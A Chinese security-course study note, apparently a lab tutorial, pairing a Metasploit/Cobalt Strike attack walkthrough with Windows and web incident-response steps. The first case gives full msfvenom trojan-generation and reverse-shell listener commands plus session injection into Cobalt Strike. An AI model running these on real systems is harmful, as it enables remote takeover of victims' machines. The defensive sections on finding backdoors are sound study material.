数据来源
演示案例
- MSF&CobaltStrike 联动 Shell
- WEB 攻击应急响应朔源-后门,日志
- WIN 系统攻击应急响应朔源-后门,日志,流量
- 临时给大家看看学的好的怎么干对应 CTF 比赛
案例1 - MSF&CobaltStrike联动Shell
CS下载与安装:cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客
环境准备:一台kali,一台靶机(我这里为了简单一点,就用两台虚拟机,你可以在远程服务器部署CS,然后kali中运行MSF(kail自带),最后在找一台靶机)
CS->MSF
1)先配置cs
先使用CS创建一个监听器
随便使用个监听器生成木马并上线就好(使用那个监听器生成木马上线都行,只要能上线)
2)使用msf创建监听
我这里是在kali中重新打开一个终端(msf是kali自带的)
msfconsole # 启动 metasploita命令行
use exploit/multi/handler # 使用模块
set payload windows/meterpreter/reverse_http # 这里使用的攻击载荷要与CS监听器的相同(名字并不是完全相同,同样是windows的模块 然后最后的协议一样就好reverse_http)
set lhost 192.168.22.145 # 设置监听的ip,要与cs的监听器相同
set lport 6677 # 端口也要与cs监听器端口保持一致
run # 启动模块
然后回到cs将后门的shell转发一个给msf
大概等一分钟左右就上线了
MSF->CS
1)CS创建监听器
2)使用msf拿到受害者的shell会话
要使用msf创建木马然后开启监听,再把木马复制到受害者主机中上线
生成木马
# 攻击载荷 监听ip 监听端口 demo999.exe(生成的文件名)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe
开启监听
msfconsole # 启动 metasploita命令行
use exploit/multi/handler # 使用模块
set payload windows/x64/meterpreter/reverse_tcp # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3 # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址
set lport 9988 # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样
run # 简单理解就是把鱼钩放到河里
到靶机中执行木马
监听msf的监听情况,成功拿到shell
3)msf获取到shell会话后的操作
先background退出会话,查看当前的sessions会话
进入模块exploit/windows/local/payload_inject,查看需要设置的参数
use exploit/windows/local/payload_inject # 进入模块
show options # 查看设置
设置payload,这里的payload需要与cs处监听器设置的协议保持一致
set payload windows/meterpreter/reverse_httpshow options查看并设置参数,设置端口,与cs处保持一致,设置lhost为cs服务器的ip地址,载入对应的session会话
set lport 17822 # 端口需要与cs监听器端口保持一致``
set lhost 192.168.1.3 # IP设置为msf本地IP,与CS设置保持一致``
set session 1 # 最开启查看的session的id就是1
run # 最后运行攻击模块 
案例2 - WEB攻击应急响应溯源-后门,日志
故事回顾:某客户反应自己的网站首页出现被篡改,请求支援
分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式
- 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
- 思路2:利用后门WebShell查杀脚本或工具找到对应后门文件,定位第一次时间分析
netstat -ano
站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。
1)执行netstat -ano命令,通过开放的端口找到对应的PID。
netstat -ano # 查看本机开放的端口
2)执行tasklist -svc命令,通过PID找到对应的进程名称
tasklist /svc
3)在任务管理器,找到对应的进程
之后就可以停止服务并删除文件
4)也可以进行日志分析
p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客
p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客
案例3 - Win系统攻击应急响应溯源-后门,日志,流量
分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式
故事回顾:某客户反应服务器异常出现卡顿等情况
思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量
获取进程监控:PCHunter64
一般的木马是没有产商信息
但是有些伪装的很好所以这个不能作为我们判断的唯一标准,可以再借助一些其他信息辅助我们进行判断
远程ip
可以在目标主机的命令行查看端口信息
# 查看本机端口开放信息
netstat -an
计划任务
系统用户名
还可以借助一些杀毒软件:腾讯、360、火绒这些
获取执行列表:UserAssistView
我感觉这个软件没有 PCHunter64 好用
涉及资源
- https://www.onlinedown.net/soft/628964.htm
- https://www.cnblogs.com/xiaozi/p/12679777.html
- http://www.pc6.com/softview/SoftView_195167.html
- https://github.com/EricZimmerman/AppCompatCacheParser/releases/
